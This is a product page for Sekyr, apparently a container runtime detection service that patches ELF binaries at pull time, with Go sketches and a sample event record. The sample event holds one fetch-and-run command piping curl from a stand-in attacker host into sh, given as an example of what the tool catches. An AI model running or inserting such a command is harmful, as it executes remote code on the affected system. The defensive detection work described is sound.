Detection that travels with the image, not the host.
Sekyr is an OCI pull-through proxy. You keep pushing images to your own registry; your orchestrator pulls them through Sekyr. On the way through, we add one extra layer on top of the image. That layer holds patched copies of every ELF binary we found inside, plus a tiny reporter. The originals are still served unchanged. When a patched binary runs, that execution itself is the event. Our observation code records who is running (binary path, argv, parent process chain, non-sensitive env) and which network connections are active for that process, and ships it back to Sekyr. Nothing else runs on your hosts.
- Surface: OCI Distribution Spec, pull only
- Footprint: one added layer, a few MB
- Mechanism: binary patching at pull time
- Runtime: agentless; runs only when patched binaries do
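In OCI terms, that one added layer is literally one more descriptor appended to the image manifest. A minimal sketch of the idea in Go, assuming the standard OCI image manifest schema; the types are trimmed and the digests are placeholders, not Sekyr's actual code:

package main

import (
	"encoding/json"
	"fmt"
)

// Descriptor and Manifest mirror the OCI image manifest schema,
// trimmed to the fields this sketch needs.
type Descriptor struct {
	MediaType string `json:"mediaType"`
	Digest    string `json:"digest"`
	Size      int64  `json:"size"`
}

type Manifest struct {
	SchemaVersion int          `json:"schemaVersion"`
	MediaType     string       `json:"mediaType"`
	Config        Descriptor   `json:"config"`
	Layers        []Descriptor `json:"layers"`
}

// addObservationLayer leaves every original layer untouched and appends one
// descriptor for the tarball of patched binaries plus the reporter. A real
// implementation would also append the layer's DiffID to rootfs.diff_ids in
// the image config and re-digest both blobs.
func addObservationLayer(m Manifest, patched Descriptor) Manifest {
	m.Layers = append(m.Layers, patched)
	return m
}

func main() {
	m := Manifest{
		SchemaVersion: 2,
		MediaType:     "application/vnd.oci.image.manifest.v1+json",
		Config:        Descriptor{MediaType: "application/vnd.oci.image.config.v1+json", Digest: "sha256:config...", Size: 1469},
		Layers: []Descriptor{
			{MediaType: "application/vnd.oci.image.layer.v1.tar+gzip", Digest: "sha256:original...", Size: 31457280},
		},
	}
	m = addObservationLayer(m, Descriptor{
		MediaType: "application/vnd.oci.image.layer.v1.tar+gzip",
		Digest:    "sha256:patched...", // placeholder digest for the added layer
		Size:      3 << 20,             // the "few MB" footprint
	})
	out, _ := json.MarshalIndent(m, "", "  ")
	fmt.Println(string(out))
}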
Where Sekyr sits.
A pull-through proxy that sits between your orchestrator and the upstream registry. You still push images to your own registry; your orchestrator pulls them through us. The only change is a URL prefix: an image like ghcr.io/acme/api is pulled as sekyr.cloud/ghcr/acme/api. On first pull we analyze the image, patch every ELF binary we find, and ship the result back with one extra layer on top of the original. Repeat pulls hit the cache and pass through unchanged.
What happens on docker pull.
From the client's perspective, this is a normal OCI pull. Pushes still go to your upstream registry; we never accept them. Inside the cache, four steps run on first pull before the manifest is returned. Repeat pulls of the same digest are a cache hit. We do not touch signatures, do not check provenance against any allowlist, and do not modify your original layers.
- 01
Scan
Walk the image. Identify every ELF binary inside it: shells, package binaries under /usr/bin, busybox applets, language runtimes, anything that can be exec’d. A sketch of this walk follows the list.
- 02
Patch
Add a small observation routine to each ELF binary in the image. The routine sits dormant until the binary is executed; when it is, the routine wakes up alongside the binary and forks a small reporter side-process that emits one event and exits.
- 03
Overlay
Wrap the patched copies and the reporter into a single extra layer on top of the existing image. Original layers are byte-for-byte unchanged. The entrypoint is not rewritten; signatures and provenance are not touched.
- 04
Deliver
Serve the original image plus our one added layer. Same OCI protocol, same digest verification. Subsequent pulls hit the content-addressed cache.
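Step 01 is less magic than it sounds: an ELF binary announces itself in its first four bytes, regardless of its name or location. A hypothetical sketch in Go of walking an unpacked image rootfs, illustrative only, not Sekyr's actual scanner:

package main

import (
	"bytes"
	"fmt"
	"io"
	"io/fs"
	"os"
	"path/filepath"
)

var elfMagic = []byte{0x7f, 'E', 'L', 'F'}

// isELF reports whether the file starts with the ELF magic number. This is
// what catches shells, /usr/bin packages, busybox applets, and language
// runtimes alike: anything that can be exec'd.
func isELF(path string) bool {
	f, err := os.Open(path)
	if err != nil {
		return false
	}
	defer f.Close()
	head := make([]byte, 4)
	if _, err := io.ReadFull(f, head); err != nil {
		return false
	}
	return bytes.Equal(head, elfMagic)
}

func main() {
	root := os.Args[1] // directory holding the unpacked image filesystem
	filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return nil // skip unreadable entries, directories, and symlinks
		}
		if isELF(path) {
			fmt.Println(path) // candidate for patching in step 02
		}
		return nil
	})
}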
What runs at runtime. Almost nothing.
Sekyr is agentless. There is no daemon on the host, no PID 1 supervisor in the container, no syscall funnel. The patched binaries run as themselves. The execution of one of those binaries IS the event we care about; it wakes the observation code, which forks a small reporter side-process to send one event and exit. Long-running idle workloads cost nothing.
What we listen for.
No profiles, no allowlists, no learning windows. Every patched binary carries the same observation code, and every execution of one of those binaries produces an event with the same shape. What we record is below, followed by a sketch of how a reporter could assemble it.
Who is running
For every execution we capture the binary path, argv, argv[0] (which can differ from the binary path), and the parent PID chain back to PID 1. Command injection shows up here, like a webserver suddenly running /bin/sh -c, a cron spawning curl, or a database forking a shell.
Network connections
For the same execution, we record the network connections that process has open. Catches workloads reaching addresses they have no business reaching, like exfiltration destinations, C2 endpoints, or internal services they should never touch.
Process context
Parent PID chain and non-sensitive environment variables go out with each event. Lets you reconstruct who spawned what, even when the chain crosses several short-lived processes.
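To make that concrete, here is a hypothetical reporter in Go that assembles the "who is running" and process-context parts from Linux's /proc; the network half would enumerate the process's open sockets the same way. The shape matches the event sample below, but the code is an illustration, not Sekyr's reporter:

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"os"
	"strconv"
	"strings"
)

type parent struct {
	PID  int    `json:"pid"`
	Comm string `json:"comm"`
	Exe  string `json:"exe"`
}

// parentChain follows ppid links in /proc/<pid>/stat back to PID 1.
func parentChain(pid int) []parent {
	var chain []parent
	for pid >= 1 {
		raw, err := os.ReadFile(fmt.Sprintf("/proc/%d/stat", pid))
		if err != nil {
			break
		}
		// Format: pid (comm) state ppid ...; comm may contain spaces,
		// so anchor on the last ')'.
		s := string(raw)
		end := strings.LastIndexByte(s, ')')
		comm := s[strings.IndexByte(s, '(')+1 : end]
		ppid, _ := strconv.Atoi(strings.Fields(s[end+2:])[1])
		exe, _ := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
		chain = append(chain, parent{PID: pid, Comm: comm, Exe: exe})
		if pid == 1 {
			break
		}
		pid = ppid
	}
	return chain
}

func main() {
	pid := os.Getppid() // the patched binary that forked this reporter
	raw, _ := os.ReadFile(fmt.Sprintf("/proc/%d/cmdline", pid))
	var argv []string
	for _, a := range bytes.Split(bytes.TrimRight(raw, "\x00"), []byte{0}) {
		argv = append(argv, string(a))
	}
	event := map[string]any{
		"event":   "process.exec",
		"exec":    map[string]any{"argv": argv},
		"parents": parentChain(pid),
	}
	// A real reporter would ship this to the collector and exit immediately.
	json.NewEncoder(os.Stdout).Encode(event)
}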
One event per hook hit.
Every event has the same shape: what happened, where it was called from, who its parent was. The control plane is a search and alerting view over those events.
{
  "ts": "2026-04-26T14:22:08.412Z",
  "workload": "api-7f9c8d6b4-x2k7l",
  "image": "sekyr.cloud/ghcr/acme/api@sha256:f9c8d6b4...",
  "event": "process.exec",
  "exec": {
    "path": "/bin/sh",
    "argv": ["sh", "-c", "curl http://attacker.example/x | sh"],
    "cwd": "/app"
  },
  "parents": [
    { "pid": 412, "comm": "sh", "exe": "/bin/sh" },
    { "pid": 411, "comm": "node", "exe": "/usr/local/bin/node" },
    { "pid": 1, "comm": "node", "exe": "/usr/local/bin/node" }
  ],
  "env_safe": { "NODE_ENV": "production", "PORT": "8080" },
  "site": { "binary": "/usr/local/bin/node", "offset": "0x4f12" }
}

Reporters ship events to the Sekyr analysis engine. We filter aggressively at ingest and deduplicate events we have already seen for the same image and call site, so only real, novel signals enter the analysis pipeline. We run the behavioural detection on top, so you don’t pipe the raw stream into your own SIEM and you don’t hand-write detection rules. Findings surface in the control plane and via webhooks or the alerting destination of your choice.
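One way to picture the ingest dedup: key each event on the image digest plus the call site and drop repeats. A hypothetical sketch assuming exactly that keying; the real pipeline may weigh more fields:

package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

var seen = map[string]bool{}

// dedupKey collapses repeat sightings of the same call site in the same image.
func dedupKey(imageDigest, siteBinary, siteOffset string) string {
	h := sha256.Sum256([]byte(imageDigest + "\x00" + siteBinary + "\x00" + siteOffset))
	return hex.EncodeToString(h[:])
}

// ingest returns true only for novel signals worth analysing.
func ingest(imageDigest, siteBinary, siteOffset string) bool {
	k := dedupKey(imageDigest, siteBinary, siteOffset)
	if seen[k] {
		return false // already seen: drop at ingest
	}
	seen[k] = true
	return true
}

func main() {
	fmt.Println(ingest("sha256:f9c8d6b4", "/usr/local/bin/node", "0x4f12")) // true
	fmt.Println(ingest("sha256:f9c8d6b4", "/usr/local/bin/node", "0x4f12")) // false
}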
What this costs you. Almost nothing, most of the time.
The honest version: we don't have hard numbers to publish yet, but the shape of the cost is structural, not a tuning exercise. Work happens once per image at pull time, and at runtime only when a patched binary actually executes. The comparison with eBPF and agent-based monitors below shows where that sits relative to the alternatives.
What we run on.
Sekyr speaks OCI on the pull path. You keep using your existing registry for pushes; if it implements the OCI Distribution Spec on the read side and your runtime implements the OCI Runtime Spec, Sekyr fits in front of it.
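Concretely, "pull only" is a small surface: under the OCI Distribution Spec, a pull is just GET and HEAD requests against /v2/<name>/manifests/<reference> and /v2/<name>/blobs/<digest>. A toy sketch of that read-only front in Go, not the actual proxy:

package main

import (
	"log"
	"net/http"
)

func main() {
	http.HandleFunc("/v2/", func(w http.ResponseWriter, r *http.Request) {
		// A pull only ever needs GET and HEAD on manifests and blobs;
		// pushes (POST/PUT/PATCH) belong to your upstream registry.
		if r.Method != http.MethodGet && r.Method != http.MethodHead {
			http.Error(w, "pull only", http.StatusMethodNotAllowed)
			return
		}
		// ... resolve from the content-addressed cache or the upstream,
		// patch on first pull, serve with normal digest verification ...
	})
	log.Fatal(http.ListenAndServe(":5000", nil))
}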
Registries
- Docker Hub (tested)
- GitHub Container Registry (tested)
- AWS ECR (tested)
- Google Artifact Registry (tested)
- GitLab Container Registry (tested)
- Harbor (compatible)
- Quay.io (compatible)
- Self-hosted, any OCI Distribution Spec registry (compatible)
Orchestrators
- Kubernetes 1.24+ (tested)
- Amazon ECS (tested)
- Nomad 1.6+ (compatible)
- Docker / Compose (tested)
- OpenShift 4.x (compatible)
Architectures
- linux/amd64 (tested)
- linux/arm64 (tested)
- linux/arm/v7 (compatible)
- Distroless base images (tested)
- Alpine / musl (tested)
- Scratch images (tested)
Detection, not enforcement.
Sekyr is detection-only. We do not block, kill, or interfere with your workload; we just report. The list below is what we actually catch from observing binary executions, and what we deliberately don’t.
What we catch
- Command injection, where a process execs a shell with attacker-controlled argv
- Lateral movement, where workloads reach internal services they’ve never touched
- Suspicious exec chains, like webserver → sh → curl → sh, or other anomalous parents
- Unexpected outbound network dials to exfiltration destinations or C2 callbacks
- Living-off-the-land, where busybox or coreutils binaries get used inside an image that doesn’t normally need them
- Crypto-miner drop and run, where short-lived exec patterns betray payload delivery
What we don’t do
- We do not block, kill, or signal processes. Detection only.
- We do not catch attacks that never exec a binary or open a socket, so pure in-process memory corruption is invisible to us
- We do not see statically linked binaries the cache wasn’t able to identify (rare, but possible)
- We do not protect against kernel-level exploits or rootkits; that is the host’s job
- We do not stop build-time supply chain attacks before the image reaches the registry
- We do not defend against malicious insiders with cluster-admin and event-pipeline rights
Sekyr vs eBPF / agent-based container monitors.
Falco-style stacks put a privileged agent on every host and watch the kernel. We put the hooks inside the image, spend CPU only when something interesting actually happens, and let the analysis side filter and deduplicate before anything reaches you. Different place to stand, different cost shape.
- Sekyr: detection inside the image
- eBPF + agent monitors: a daemon on every host, in the kernel
Read the docs. Pull an image. See what it does.
Start a free trial. No agent install, no orchestrator changes beyond a URL prefix.